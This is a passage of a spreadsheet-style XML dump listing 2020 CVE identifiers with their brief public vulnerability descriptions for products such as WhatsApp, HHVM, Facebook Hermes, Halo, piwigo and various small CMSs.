    <t>A security feature bypass issue in WhatsApp Desktop versions prior to v0.3.4932 could have allowed for sandbox escape in Electron and escalation of privilege if combined with a remote code execution vulnerability inside the sandboxed renderer process.</t>
  </si>
  <si>
    <t>CVE-2020-18890</t>
  </si>
  <si>
    <t>Rmote Code Execution (RCE) vulnerability in puppyCMS v5.1 due to insecure permissions, which could let a remote malicious user getshell via /admin/functions.php.</t>
  </si>
  <si>
    <t>CVE-2020-18897</t>
  </si>
  <si>
    <t>An use-after-free vulnerability in the libpff_item_tree_create_node function of libyal Libpff before 20180623 allows attackers to cause a denial of service (DOS) or execute arbitrary code via a crafted pff file.</t>
  </si>
  <si>
    <t>CVE-2020-18898</t>
  </si>
  <si>
    <t>A stack exhaustion issue in the printIFDStructure function of Exiv2 0.27 allows remote attackers to cause a denial of service (DOS) via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2020-18899</t>
  </si>
  <si>
    <t>An uncontrolled memory allocation in DataBufdata(subBox.length-sizeof(box)) function of Exiv2 0.27 allows attackers to cause a denial of service (DOS) via a crafted input.</t>
  </si>
  <si>
    <t>CVE-2020-1890</t>
  </si>
  <si>
    <t>A URL validation issue in WhatsApp for Android prior to v2.20.11 and WhatsApp Business for Android prior to v2.20.2 could have caused the recipient of a sticker message containing deliberately malformed data to load an image from a sender-controlled URL without user interaction.</t>
  </si>
  <si>
    <t>CVE-2020-18900</t>
  </si>
  <si>
    <t>** DISPUTED ** A heap-based buffer overflow in the libexe_io_handle_read_coff_optional_header function of libyal libexe before 20181128. NOTE: the vendor has disputed this as described in libyal/libexe issue 1 on GitHub.</t>
  </si>
  <si>
    <t>CVE-2020-1891</t>
  </si>
  <si>
    <t>A user controlled parameter used in video call in WhatsApp for Android prior to v2.20.17, WhatsApp Business for Android prior to v2.20.7, WhatsApp for iPhone prior to v2.20.20, and WhatsApp Business for iPhone prior to v2.20.20 could have allowed an out-of-bounds write on 32-bit devices.</t>
  </si>
  <si>
    <t>CVE-2020-18913</t>
  </si>
  <si>
    <t>EARCLINK ESPCMS-P8 was discovered to contain a SQL injection vulnerability in the espcms_web/Search.php component via the attr_array parameter. This vulnerability allows attackers to access sensitive database information.</t>
  </si>
  <si>
    <t>CVE-2020-18917</t>
  </si>
  <si>
    <t>The plus/search.php component in DedeCMS 5.7 SP2 allows remote attackers to execute arbitrary PHP code via the typename parameter because the contents of typename.inc are under an attacker's control.</t>
  </si>
  <si>
    <t>CVE-2020-1892</t>
  </si>
  <si>
    <t>Insufficient boundary checks when decoding JSON in JSON_parser allows read access to out of bounds memory, potentially leading to information leak and DOS. This issue affects HHVM 4.45.0, 4.44.0, 4.43.0, 4.42.0, 4.41.0, 4.40.0, 4.39.0, versions between 4.33.0 and 4.38.0 (inclusive), versions between 4.9.0 and 4.32.0 (inclusive), and versions prior to 4.8.7.</t>
  </si>
  <si>
    <t>CVE-2020-1893</t>
  </si>
  <si>
    <t>Insufficient boundary checks when decoding JSON in TryParse reads out of bounds memory, potentially leading to DOS. This issue affects HHVM 4.45.0, 4.44.0, 4.43.0, 4.42.0, 4.41.0, 4.40.0, 4.39.0, versions between 4.33.0 and 4.38.0 (inclusive), versions between 4.9.0 and 4.32.0 (inclusive), and versions prior to 4.8.7.</t>
  </si>
  <si>
    <t>CVE-2020-1894</t>
  </si>
  <si>
    <t>A stack write overflow in WhatsApp for Android prior to v2.20.35, WhatsApp Business for Android prior to v2.20.20, WhatsApp for iPhone prior to v2.20.30, and WhatsApp Business for iPhone prior to v2.20.30 could have allowed arbitrary code execution when playing a specially crafted push to talk message.</t>
  </si>
  <si>
    <t>CVE-2020-1895</t>
  </si>
  <si>
    <t>A large heap overflow could occur in Instagram for Android when attempting to upload an image with specially crafted dimensions. This affects versions prior to 128.0.0.26.128.</t>
  </si>
  <si>
    <t>CVE-2020-1896</t>
  </si>
  <si>
    <t>A stack overflow vulnerability in Facebook Hermes 'builtin apply' prior to commit 86543ac47e59c522976b5632b8bf9a2a4583c7d2 (https://github.com/facebook/hermes/commit/86543ac47e59c522976b5632b8bf9a2a4583c7d2) allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-18964</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) Vulnerability in ForestBlog latest version via the website Management background, which could let a remote malicious gain privileges.</t>
  </si>
  <si>
    <t>CVE-2020-1897</t>
  </si>
  <si>
    <t>A use-after-free is possible due to an error in lifetime management in the request adaptor when a malicious client invokes request error handling in a specific sequence. This issue affects versions of proxygen prior to v2020.05.18.00.</t>
  </si>
  <si>
    <t>CVE-2020-18971</t>
  </si>
  <si>
    <t>Stack-based Buffer Overflow in PoDoFo v0.9.6 allows attackers to cause a denial of service via the component 'src/base/PdfDictionary.cpp:65'.</t>
  </si>
  <si>
    <t>CVE-2020-18972</t>
  </si>
  <si>
    <t>Exposure of Sensitive Information to an Unauthorized Actor in PoDoFo v0.9.6 allows attackers to obtain sensitive information via 'IsNextToken' in the component 'src/base/PdfToenizer.cpp'.</t>
  </si>
  <si>
    <t>CVE-2020-18974</t>
  </si>
  <si>
    <t>Buffer Overflow in Netwide Assembler (NASM) v2.15.xx allows attackers to cause a denial of service via 'crc64i' in the component 'nasmlib/crc64'. This issue is different than CVE-2019-7147.</t>
  </si>
  <si>
    <t>CVE-2020-18976</t>
  </si>
  <si>
    <t>Buffer Overflow in Tcpreplay v4.3.2 allows attackers to cause a Denial of Service via the 'do_checksum' function in 'checksum.c'. It can be triggered by sending a crafted pcap file to the 'tcpreplay-edit' binary. This issue is different than CVE-2019-8381.</t>
  </si>
  <si>
    <t>CVE-2020-18979</t>
  </si>
  <si>
    <t>Cross Siste Scripting (XSS) vulnerablity in Halo 0.4.3 via the X-forwarded-for Header parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1898</t>
  </si>
  <si>
    <t>The fb_unserialize function did not impose a depth limit for nested deserialization. That meant a maliciously constructed string could cause deserialization to recurse, leading to stack exhaustion. This issue affected HHVM prior to v4.32.3, between versions 4.33.0 and 4.56.0, 4.57.0, 4.58.0, 4.58.1, 4.59.0, 4.60.0, 4.61.0, 4.62.0.</t>
  </si>
  <si>
    <t>CVE-2020-18980</t>
  </si>
  <si>
    <t>Remote Code Executon vulnerability in Halo 0.4.3 via the remoteAddr and themeName parameters.</t>
  </si>
  <si>
    <t>CVE-2020-18982</t>
  </si>
  <si>
    <t>Cross Sie Scripting (XSS) vulnerability in Halo 0.4.3 via CommentAuthorUrl.</t>
  </si>
  <si>
    <t>CVE-2020-18984</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in the zimbraAdmin/public/secureRequest.jsp component of Zimbra Collaboration 8.8.12 allows unauthenticated attackers to execute arbitrary web scripts or HTML via a host header injection.</t>
  </si>
  <si>
    <t>CVE-2020-18985</t>
  </si>
  <si>
    <t>An issue in /domain/service/.ewell-known/caldav of Zimbra Collaboration 8.8.12 allows attackers to redirect users to any arbitrary website of their choosing.</t>
  </si>
  <si>
    <t>CVE-2020-1899</t>
  </si>
  <si>
    <t>The unserialize() function supported a type code, "S", which was meant to be supported only for APC serialization. This type code allowed arbitrary memory addresses to be accessed as if they were static StringData objects. This issue affected HHVM prior to v4.32.3, between versions 4.33.0 and 4.56.0, 4.57.0, 4.58.0, 4.58.1, 4.59.0, 4.60.0, 4.61.0, 4.62.0.</t>
  </si>
  <si>
    <t>CVE-2020-18998</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/custom/blog-plugin/add'.</t>
  </si>
  <si>
    <t>CVE-2020-18999</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Blog_mini v1.0 allows remote attackers to execute arbitrary code via the component '/admin/submit-articles'.</t>
  </si>
  <si>
    <t>CVE-2020-1900</t>
  </si>
  <si>
    <t>When unserializing an object with dynamic properties HHVM needs to pre-reserve the full size of the dynamic property array before inserting anything into it. Otherwise the array might resize, invalidating previously stored references. This pre-reservation was not occurring in HHVM prior to v4.32.3, between versions 4.33.0 and 4.56.0, 4.57.0, 4.58.0, 4.58.1, 4.59.0, 4.60.0, 4.61.0, 4.62.0.</t>
  </si>
  <si>
    <t>CVE-2020-19000</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Simiki v1.6.2.1 and prior allows remote attackers to execute arbitrary code via line 54 of the component 'simiki/blob/master/simiki/generators.py'.</t>
  </si>
  <si>
    <t>CVE-2020-19001</t>
  </si>
  <si>
    <t>Command Injection in Simiki v1.6.2.1 and prior allows remote attackers to execute arbitrary system commands via line 64 of the component 'simiki/blob/master/simiki/config.py'.</t>
  </si>
  <si>
    <t>CVE-2020-19002</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Mezzanine v4.3.1 allows remote attackers to execute arbitrary code via the 'Description' field of the component 'admin/blog/blogpost/add/'. This issue is different than CVE-2018-16632.</t>
  </si>
  <si>
    <t>CVE-2020-19003</t>
  </si>
  <si>
    <t>An issue in Gate One 1.2.0 allows attackers to bypass to the verification check done by the origins list and connect to Gate One instances used by hosts not on the origins list.</t>
  </si>
  <si>
    <t>CVE-2020-19005</t>
  </si>
  <si>
    <t>zrlog v2.1.0 has a vulnerability with the permission check. If admin account is logged in, other unauthorized users can download the database backup file directly.</t>
  </si>
  <si>
    <t>CVE-2020-19007</t>
  </si>
  <si>
    <t>Halo blog 1.2.0 allows users to submit comments on blog posts via /api/content/posts/comments. The javascript code supplied by the attacker will then execute in the victim user's browser.</t>
  </si>
  <si>
    <t>CVE-2020-1901</t>
  </si>
  <si>
    <t>Receiving a large text message containing URLs in WhatsApp for iOS prior to v2.20.91.4 could have caused the application to freeze while processing the message.</t>
  </si>
  <si>
    <t>CVE-2020-1902</t>
  </si>
  <si>
    <t>A user running a quick search on a highly forwarded message on WhatsApp for Android from v2.20.108 to v2.20.140 or WhatsApp Business for Android from v2.20.35 to v2.20.49 could have been sent to the Google service over plain HTTP.</t>
  </si>
  <si>
    <t>CVE-2020-1903</t>
  </si>
  <si>
    <t>An issue when unzipping docx, pptx, and xlsx documents in WhatsApp for iOS prior to v2.20.61 and WhatsApp Business for iOS prior to v2.20.61 could have resulted in an out-of-memory denial of service. This issue would have required the receiver to explicitly open the attachment if it was received from a number not in the receiver's WhatsApp contacts.</t>
  </si>
  <si>
    <t>CVE-2020-19037</t>
  </si>
  <si>
    <t>Incorrect Access Control vulnearbility in Halo 0.4.3, which allows a malicious user to bypass encrption to view encrpted articles via cookies.</t>
  </si>
  <si>
    <t>CVE-2020-19038</t>
  </si>
  <si>
    <t>File Deletion vulnerability in Halo 0.4.3 via delBackup.</t>
  </si>
  <si>
    <t>CVE-2020-1904</t>
  </si>
  <si>
    <t>A path validation issue in WhatsApp for iOS prior to v2.20.61 and WhatsApp Business for iOS prior to v2.20.61 could have allowed for directory traversal overwriting files when sending specially crafted docx, xlsx, and pptx files as attachments to messages.</t>
  </si>
  <si>
    <t>CVE-2020-19042</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability exists in zzcms 2019 XSS via a modify action in user/adv.php.</t>
  </si>
  <si>
    <t>CVE-2020-19046</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in S-CMS v1.0 allows remote attackers to execute arbitrary code via the component '/admin/tpl.php?page='.</t>
  </si>
  <si>
    <t>CVE-2020-19047</t>
  </si>
  <si>
    <t>Cross Site Request Forgey (CSRF) in iWebShop v5.3 allows remote atatckers to execute arbitrary code via malicious POST request to the component '/index.php?controller=system&amp;action=admin_edit_act'.</t>
  </si>
  <si>
    <t>CVE-2020-19048</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in MyBB v1.8.20 allows remote attackers to inject arbitrary web script or HTML via the "Title" field found in the "Add New Forum" page by doing an authenticated POST HTTP request to '/Upload/admin/index.php?module=forum-management&amp;action=add'.</t>
  </si>
  <si>
    <t>CVE-2020-19049</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in MyBB v1.8.20 allows remote attackers to inject arbitrary web script or HTML via the "Description" field found in the "Add New Forum" page by doing an authenticated POST HTTP request to '/Upload/admin/index.php?module=forum-management&amp;action=add'.</t>
  </si>
  <si>
    <t>CVE-2020-1905</t>
  </si>
  <si>
    <t>Media ContentProvider URIs used for opening attachments in other apps were generated sequentially prior to WhatsApp for Android v2.20.185, which could have allowed a malicious third party app chosen to open the file to guess the URIs for previously opened attachments until the opener app is terminated.</t>
  </si>
  <si>
    <t>CVE-2020-1906</t>
  </si>
  <si>
    <t>A buffer overflow in WhatsApp for Android prior to v2.20.130 and WhatsApp Business for Android prior to v2.20.46 could have allowed an out-of-bounds write when processing malformed local videos with E-AC-3 audio streams.</t>
  </si>
  <si>
    <t>CVE-2020-1907</t>
  </si>
  <si>
    <t>A stack overflow in WhatsApp for Android prior to v2.20.196.16, WhatsApp Business for Android prior to v2.20.196.12, WhatsApp for iOS prior to v2.20.90, WhatsApp Business for iOS prior to v2.20.90, and WhatsApp for Portal prior to v173.0.0.29.505 could have allowed arbitrary code execution when parsing the contents of an RTP Extension header.</t>
  </si>
  <si>
    <t>CVE-2020-1908</t>
  </si>
  <si>
    <t>Improper authorization of the Screen Lock feature in WhatsApp and WhatsApp Business for iOS prior to v2.20.100 could have permitted use of Siri to interact with the WhatsApp application even after the phone was locked.</t>
  </si>
  <si>
    <t>CVE-2020-1909</t>
  </si>
  <si>
    <t>A use-after-free in a logging library in WhatsApp for iOS prior to v2.20.111 and WhatsApp Business for iOS prior to v2.20.111 could have resulted in memory corruption, crashes and potentially code execution. This could have happened only if several events occurred together in sequence, including receiving an animated sticker while placing a WhatsApp video call on hold.</t>
  </si>
  <si>
    <t>CVE-2020-1910</t>
  </si>
  <si>
    <t>A missing bounds check in WhatsApp for Android prior to v2.21.1.13 and WhatsApp Business for Android prior to v2.21.1.13 could have allowed out-of-bounds read and write if a user applied specific image filters to a specially crafted image and sent the resulting image.</t>
  </si>
  <si>
    <t>CVE-2020-19107</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Online Book Store v1.0 via the isbn parameter to edit_book.php, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-19108</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Online Book Store v1.0 via the pubid parameter to bookPerPub.php, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-19109</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Online Book Store v1.0 via the bookisbn parameter to admin_edit.php, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-1911</t>
  </si>
  <si>
    <t>A type confusion vulnerability when resolving properties of JavaScript objects with specially-crafted prototype chains in Facebook Hermes prior to commit fe52854cdf6725c2eaa9e125995da76e6ceb27da allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-19110</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Online Book Store v1.0 via the bookisbn parameter to book.php parameter, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-19111</t>
  </si>
  <si>
    <t>Incorrect Access Control vulnerability in Online Book Store v1.0 via admin_verify.php, which could let a remote mailicious user bypass authentication and obtain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-19112</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Online Book Store v1.0 via the bookisbn parameter to admin_delete.php, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-19113</t>
  </si>
  <si>
    <t>Arbitrary File Upload vulnerability in Online Book Store v1.0 in admin_add.php, which may lead to remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-19114</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in Online Book Store v1.0 via the publisher parameter to edit_book.php, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-19118</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerabiity in YzmCMS 5.2 via the site_code parameter in admin/index/init.html.</t>
  </si>
  <si>
    <t>CVE-2020-1912</t>
  </si>
  <si>
    <t>An out-of-bounds read/write vulnerability when executing lazily compiled inner generator functions in Facebook Hermes prior to commit 091835377369c8fd5917d9b87acffa721ad2a168 allows attackers to potentially execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-1913</t>
  </si>
  <si>
    <t>An Integer signedness error in the JavaScript Interpreter in Facebook Hermes prior to commit 2c7af7ec481ceffd0d14ce2d7c045e475fd71dc6 allows attackers to cause a denial of service attack or a potential RCE via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-19131</t>
  </si>
  <si>
    <t>Buffer Overflow in LibTiff v4.0.10 allows attackers to cause a denial of service via the "invertImage()" function in the component "tiffcrop".</t>
  </si>
  <si>
    <t>CVE-2020-19137</t>
  </si>
  <si>
    <t>Incorrect Access Control in Autumn v1.0.4 and earlier allows remote attackers to obtain clear-text login credentials via the component "autumn-cms/user/getAllUser/?page=1&amp;limit=10".</t>
  </si>
  <si>
    <t>CVE-2020-19138</t>
  </si>
  <si>
    <t>Unrestricted Upload of File with Dangerous Type in DotCMS v5.2.3 and earlier allow remote attackers to execute arbitrary code via the component "/src/main/java/com/dotmarketing/filters/CMSFilter.java".</t>
  </si>
  <si>
    <t>CVE-2020-1914</t>
  </si>
  <si>
    <t>A logic vulnerability when handling the SaveGeneratorLong instruction in Facebook Hermes prior to commit b2021df620824627f5a8c96615edbd1eb7fdddfc allows attackers to potentially read out of bounds or theoretically execute arbitrary code via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-19142</t>
  </si>
  <si>
    <t>iCMS 7 attackers to execute arbitrary OS commands via shell metacharacters in the DB_PREFIX parameter to install/install.php.</t>
  </si>
  <si>
    <t>CVE-2020-19143</t>
  </si>
  <si>
    <t>Buffer Overflow in LibTiff v4.0.10 allows attackers to cause a denial of service via the "TIFFVGetField" funtion in the component 'libtiff/tif_dir.c'.</t>
  </si>
  <si>
    <t>CVE-2020-19144</t>
  </si>
  <si>
    <t>Buffer Overflow in LibTiff v4.0.10 allows attackers to cause a denial of service via the 'in _TIFFmemcpy' funtion in the component 'tif_unix.c'.</t>
  </si>
  <si>
    <t>CVE-2020-19146</t>
  </si>
  <si>
    <t>Improper Access Control in Jfinal CMS v4.7.1 and earlier allows remote attackers to obtain sensitive information via the 'TemplatePath' parameter in the component 'jfinal_cms/admin/folder/list'.</t>
  </si>
  <si>
    <t>CVE-2020-19147</t>
  </si>
  <si>
    <t>Improper Access Control in Jfinal CMS v4.7.1 and earlier allows remote attackers to obtain sensitive infromation via the 'getFolder()' function in the component '/modules/filemanager/FileManager.java'.</t>
  </si>
  <si>
    <t>CVE-2020-19148</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Jfinal CMS v4.7.1 and earlier allows remote attackers to execute arbitrary code via the 'Nickname' parameter in the component '/jfinal_cms/front/person/profile.html'.</t>
  </si>
  <si>
    <t>CVE-2020-1915</t>
  </si>
  <si>
    <t>An out-of-bounds read in the JavaScript Interpreter in Facebook Hermes prior to commit 8cb935cd3b2321c46aa6b7ed8454d95c75a7fca0 allows attackers to cause a denial of service attack or possible further memory corruption via crafted JavaScript. Note that this is only exploitable if the application using Hermes permits evaluation of untrusted JavaScript. Hence, most React Native applications are not affected.</t>
  </si>
  <si>
    <t>CVE-2020-19150</t>
  </si>
  <si>
    <t>Improper Access Control in Jfinal CMS v4.7.1 and earlier allows remote attackers to obtain sensitive information or cause a denial of service via the 'FileManager.delete()' function in the component 'modules/filemanager/FileManagerController.java'.</t>
  </si>
  <si>
    <t>CVE-2020-19151</t>
  </si>
  <si>
    <t>Command Injection in Jfinal CMS v4.7.1 and earlier allows remote attackers to execute arbitrary code by uploading a malicious HTML template file via the component 'jfinal_cms/admin/filemanager/list'.</t>
  </si>
  <si>
    <t>CVE-2020-19154</t>
  </si>
  <si>
    <t>Improper Access Control in Jfinal CMS v4.7.1 and earlier allows remote attackers to obtain sensitive information via the 'FileManager.editFile()' function in the component 'modules/filemanager/FileManagerController.java'.</t>
  </si>
  <si>
    <t>CVE-2020-19155</t>
  </si>
  <si>
    <t>Improper Access Control in Jfinal CMS v4.7.1 and earlier allows remote attackers to obtain sensitive information and/or execute arbitrary code via the 'FileManager.rename()' function in the component 'modules/filemanager/FileManagerController.java'.</t>
  </si>
  <si>
    <t>CVE-2020-19156</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Ari Adminer v1 allows remote attackers to execute arbitrary code via the 'Title' parameter of the 'Add New Connections' component when the 'save()' function is called.</t>
  </si>
  <si>
    <t>CVE-2020-19157</t>
  </si>
  <si>
    <t>Cross Site Scripting (CSS) in Wenku CMS v3.4 allows remote attackers to execute arbitrary code via the 'Intro' parameter for the component '/index.php?m=ucenter&amp;a=index'.</t>
  </si>
  <si>
    <t>CVE-2020-19158</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in S-CMS build 20191014 and earlier allows remote attackers to execute arbitrary code via the 'Site Title' parameter of the component '/data/admin/#/app/config/'.</t>
  </si>
  <si>
    <t>CVE-2020-19159</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) in LaikeTui v3 allows remote attackers to execute arbitrary code via the component '/index.php?module=member&amp;action=add'.</t>
  </si>
  <si>
    <t>CVE-2020-1916</t>
  </si>
  <si>
    <t>An incorrect size calculation in ldap_escape may lead to an integer overflow when overly long input is passed in, resulting in an out-of-bounds write. This issue affects HHVM prior to 4.56.2, all versions between 4.57.0 and 4.78.0, 4.79.0, 4.80.0, 4.81.0, 4.82.0, 4.83.0.</t>
  </si>
  <si>
    <t>CVE-2020-19165</t>
  </si>
  <si>
    <t>PHPSHE 1.7 has SQL injection via the admin.php?mod=user&amp;userlevel_id=1 userlevel_id[] parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1917</t>
  </si>
  <si>
    <t>xbuf_format_converter, used as part of exif_read_data, was appending a terminating null character to the generated string, but was not using its standard append char function. As a result, if the buffer was full, it would result in an out-of-bounds write. This issue affects HHVM versions prior to 4.56.3, all versions between 4.57.0 and 4.80.1, all versions between 4.81.0 and 4.93.1, and versions 4.94.0, 4.95.0, 4.96.0, 4.97.0, 4.98.0.</t>
  </si>
  <si>
    <t>CVE-2020-1918</t>
  </si>
  <si>
    <t>In-memory file operations (ie: using fopen on a data URI) did not properly restrict negative seeking, allowing for the reading of memory prior to the in-memory buffer. This issue affects HHVM versions prior to 4.56.3, all versions between 4.57.0 and 4.80.1, all versions between 4.81.0 and 4.93.1, and versions 4.94.0, 4.95.0, 4.96.0, 4.97.0, 4.98.0.</t>
  </si>
  <si>
    <t>CVE-2020-1919</t>
  </si>
  <si>
    <t>Incorrect bounds calculations in substr_compare could lead to an out-of-bounds read when the second string argument passed in is longer than the first. This issue affects HHVM versions prior to 4.56.3, all versions between 4.57.0 and 4.80.1, all versions between 4.81.0 and 4.93.1, and versions 4.94.0, 4.95.0, 4.96.0, 4.97.0, 4.98.0.</t>
  </si>
  <si>
    <t>CVE-2020-19199</t>
  </si>
  <si>
    <t>A Cross Site Request Forgery (CSRF) vulnerability exists in PHPOK 5.2.060 via admin.php?c=admin&amp;f=save, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-1920</t>
  </si>
  <si>
    <t>A regular expression denial of service (ReDoS) vulnerability in the validateBaseUrl function can cause the application to use excessive resources, become unresponsive, or crash. This was introduced in react-native version 0.59.0 and fixed in version 0.64.1.</t>
  </si>
  <si>
    <t>CVE-2020-19201</t>
  </si>
  <si>
    <t>A Stored Cross-Site Scripting (XSS) vulnerability was found in status_filter_reload.php, a page in the pfSense software WebGUI, on Netgate pfSense version 2.4.4-p2 and earlier. The page did not encode output from the filter reload process, and a stored XSS was possible via the descr (description) parameter on NAT rules.</t>
  </si>
  <si>
    <t>CVE-2020-19202</t>
  </si>
  <si>
    <t>An authenticated Stored XSS (Cross-site Scripting) exists in the "captive.cgi" Captive Portal via the "Title of Login Page" text box or "TITLE" parameter in IPFire 2.21 (x86_64) - Core Update 130. It allows an authenticated WebGUI user with privileges to execute Stored Cross-site Scripting in the Captive Portal page.</t>
  </si>
  <si>
    <t>CVE-2020-19203</t>
  </si>
  <si>
    <t>An authenticated Cross-Site Scripting (XSS) vulnerability was found in widgets/widgets/wake_on_lan_widget.php, a component of the pfSense software WebGUI, on version 2.4.4-p2 and earlier. The widget did not encode the descr (description) parameter of wake-on-LAN entries in its output, leading to a possible stored XSS.</t>
  </si>
  <si>
    <t>CVE-2020-19204</t>
  </si>
  <si>
    <t>An authenticated Stored Cross-Site Scriptiong (XSS) vulnerability exists in Lightning Wire Labs IPFire 2.21 (x86_64) - Core Update 130 in the "routing.cgi" Routing Table Entries via the "Remark" text box or "remark" parameter. It allows an authenticated WebGUI user to execute Stored Cross-site Scripting in the Routing Table Entries.</t>
  </si>
  <si>
    <t>CVE-2020-1921</t>
  </si>
  <si>
    <t>In the crypt function, we attempt to null terminate a buffer using the size of the input salt without validating that the offset is within the buffer. This issue affects HHVM versions prior to 4.56.3, all versions between 4.57.0 and 4.80.1, all versions between 4.81.0 and 4.93.1, and versions 4.94.0, 4.95.0, 4.96.0, 4.97.0, 4.98.0.</t>
  </si>
  <si>
    <t>CVE-2020-19212</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in admin/group_list.php in piwigo v2.9.5, via the group parameter to delete.</t>
  </si>
  <si>
    <t>CVE-2020-19213</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in cat_move.php in piwigo v2.9.5, via the selection parameter to move_categories.</t>
  </si>
  <si>
    <t>CVE-2020-19215</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in admin/user_perm.php in piwigo v2.9.5, via the cat_false parameter to admin.php?page=user_perm.</t>
  </si>
  <si>
    <t>CVE-2020-19216</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in admin/user_perm.php in piwigo v2.9.5, via the cat_false parameter to admin.php?page=group_perm.</t>
  </si>
  <si>
    <t>CVE-2020-19217</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in admin/batch_manager.php in piwigo v2.9.5, via the filter_category parameter to admin.php?page=batch_manager.</t>
  </si>
  <si>
    <t>CVE-2020-19228</t>
  </si>
  <si>
    <t>An issue was found in bludit v3.13.0, unsafe implementation of the backup plugin allows attackers to upload arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-19229</t>
  </si>
  <si>
    <t>Jeesite 1.2.7 uses the apache shiro version 1.2.3 affected by CVE-2016-4437. Because of this version of the java deserialization vulnerability, an attacker could exploit the vulnerability to execute arbitrary commands via the rememberMe parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1925</t>
  </si>
  <si>
    <t>Apache Olingo versions 4.0.0 to 4.7.0 provide the AsyncRequestWrapperImpl class which reads a URL from the Location header, and then sends a GET or DELETE request to this URL. It may allow to implement a SSRF attack. If an attacker tricks a client to connect to a malicious server, the server can make the client call any URL including internal resources which are not directly accessible by the attacker.</t>
  </si>
  <si>
    <t>CVE-2020-1926</t>
  </si>
  <si>
    <t>Apache Hive cookie signature verification used a non constant time comparison which is known to be vulnerable to timing attacks. This could allow recovery of another users cookie signature. The issue was addressed in Apache Hive 2.3.8</t>
  </si>
  <si>
    <t>CVE-2020-19263</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) in MipCMS v5.0.1 allows attackers to arbitrarily escalate user privileges to administrator via index.php?s=/user/ApiAdminUser/itemEdit.</t>
  </si>
  <si>
    <t>CVE-2020-19264</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) in MipCMS v5.0.1 allows attackers to arbitrarily add users via index.php?s=/user/ApiAdminUser/itemAdd.</t>
  </si>
  <si>
    <t>CVE-2020-19265</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the index.php/Dswjcms/Basis/links component of Dswjcms 1.6.4 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-19266</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the index.php/Dswjcms/Site/articleList component of Dswjcms 1.6.4 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-19267</t>
  </si>
  <si>
    <t>An issue in index.php/Dswjcms/Basis/resources of Dswjcms 1.6.4 allows attackers to execute arbitrary code via uploading a crafted PHP file.</t>
  </si>
  <si>
    <t>CVE-2020-19268</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) in index.php/Dswjcms/User/tfAdd of Dswjcms 1.6.4 allows authenticated attackers to arbitrarily add administrator users.</t>
  </si>
  <si>
    <t>CVE-2020-1927</t>
  </si>
  <si>
    <t>In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an an unexpected URL within the request URL.</t>
  </si>
  <si>
    <t>CVE-2020-19274</t>
  </si>
  <si>
    <t>A Cross SIte Scripting (XSS) vulnerability exists in Dhcms 2017-09-18 in guestbook via the message board, which could let a remote malicious user execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-19275</t>
  </si>
